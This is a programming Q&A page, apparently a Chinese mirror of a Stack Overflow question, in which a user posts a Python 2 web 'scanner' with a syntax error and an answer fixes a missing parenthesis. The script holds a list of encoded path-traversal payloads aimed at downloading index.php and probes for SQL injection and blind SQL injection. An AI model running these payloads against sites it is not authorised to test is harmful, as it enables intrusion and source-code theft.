在同一函数中打开两个url时出错

2024-09-30 05:17:52 发布

您现在位置:Python中文网/ 问答频道 /正文
3608 3

我正在尝试编写一个简单的web应用程序。这个应用程序是一个扫描仪。这是我的密码:

import os, sys, urllib2, re, urlparse

l = []
n_l = []
b_l = []

def url(url):
  if not url.startswith('http://'):
    url = 'http://'+url
  else:
    url = url
  return url

def get_links(url):
 try:
  res = urllib2.urlopen(url)
  print 'Loading ',url
  print 'Status ',res.getcode()
  string = res.read()

  for link in re.findall(r'href=[\'"]?([^\'" >]+)', string):
    if not link.startswith('http://'):
        link = urlparse.urljoin(url, link)
    else:
        link = link
        l.append(link)
 except Exception, e:
        print str(e)

def transvers(app):
   for rl in l:
      if '?' and '=' in rl:
        rl = rl.split('=')[0]+'='
        rl = rl + app
        print 'Download Index.php from %s'%rl
        try:
         fi_le = urllib2.urlopen(rl)
         output = open('index.php','a')
         output.write(fi_le.read())
         output.close()
        except Exception, exceptions:
           print str(exceptions)

def sql_url():
    for c in l:
        if '=' in c:
           if c.endswith(('1', '2', '3', '4', '5', '6', '7', '8', '9', '0')):
              n_l.append(c+"'") 
              b_l.append(c+' AND 1 = 0')

def sql_test():
    for inj in n_l:
         responz = urllib2.urlopen(inj).read()
         print 'Trying SQL injection in %s'%inj
         if 'error in your SQL syntax' in responz:
             print 'SQL BUG FOUND IN %s'%inj
         else:
             print 'SQL bug not found in %s'%inj

def blind_injection():
    for blnd in b_l:
       rspn = urllib2.urlopen(blnd).read()
       print 'Opening ......... %s'%blnd
       rsp = urllib2.urlopen(blnd.split(' AND 1 = 0')[0].read()
       print 'Opening ........ %s'%blnd.split(' AND 1 = 0')[0]
       print 'Comparing output'
       if rspn == rsp:
          print 'Blind SQL injection bug not found in %s'%blnd
       else:
          print 'BLIND SQL IJECTION BUG FOUND IN %s'%blnd

def main():
  ins =  url(sys.argv[1])
  get_links(ins)
  col = ['../index.php', '%2e%2e%2findex,php', '%2e%2e/index.php', '..%2findex.php', '%2e%2e%5cindex.php', '%2e%2e\index.php', '..%5cindex.php','%252e%252e%255cindex.php', '..%255cindex.php','..%c0%afindex.php','..%c1%9cindex.php']
  for h in col:
      transvers(h)
    sql_url()
    sql_test()
    blind_injection()

main()

除了blind_injection()函数外,其他一切都正常。这将返回错误

File "dt.py", line 57
    print 'Opening ........ %s'%blnd.split(' AND 1 = 0')[0]
        ^
SyntaxError: invalid syntax

如何解决此错误?你知道吗


Tags: inurlforreadsqlifdeflink
1条回答
网友
1楼 · 发布于 2024-09-30 05:17:52

有paren问题,在[0]之后缺少一个结束paren,这是导致错误的原因,而不是print语句:

 rsp = urllib2.urlopen(blnd.split(' AND 1 = 0')[0].read() 
                                                  ^^

应该是:

rsp = urllib2.urlopen(blnd.split(' AND 1 = 0')[0]).read()

相关问题 更多 >

    编程相关推荐

    热门问题